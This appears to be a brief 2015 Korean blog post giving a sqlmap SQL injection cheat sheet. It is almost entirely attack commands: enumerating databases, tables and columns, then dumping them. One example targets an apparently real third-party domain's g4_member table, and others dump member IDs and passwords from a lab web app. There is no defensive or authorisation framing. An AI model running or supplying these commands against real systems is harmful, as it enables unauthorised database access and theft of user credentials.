2015.03.03 20:32

==================

SQLMAP sql injectionor 

download :  https://github.com/sqlmapproject/sqlmap

usage  : https://github.com/sqlmapproject/sqlmap/wiki/Usage


==================


GET/POST, 헤더정보 포함 텍스트 파일 생성

   (예, sample.txt)


sqlmap.py -r sample.txt --dbs --timeout 5

   -r : 생성한 텍스트파일 지정

   --dbs : 데이터베이스 검색

   --timeout : 응답 기다리는 시간 5



데이터베이스 덤프

    -D DB               DBMS database to enumerate

    -T TBL              DBMS database table to enumerate

    -C COL              DBMS database table column to enumerate

    --dump              Dump DBMS database table entries

  실행예> sqlmap.py -r a.txt --timeout 5 -D mf.webgm.co.kr -T g4_member --dump


./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" --dbs   //dbs가져오기 

./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" --tables // tables 가져오기 

./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" -T "member" --columns //columns 가져오기

./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" -T "member" -C "bId","bPass" --dump  // 값들가져오기 



 



Posted by k1rha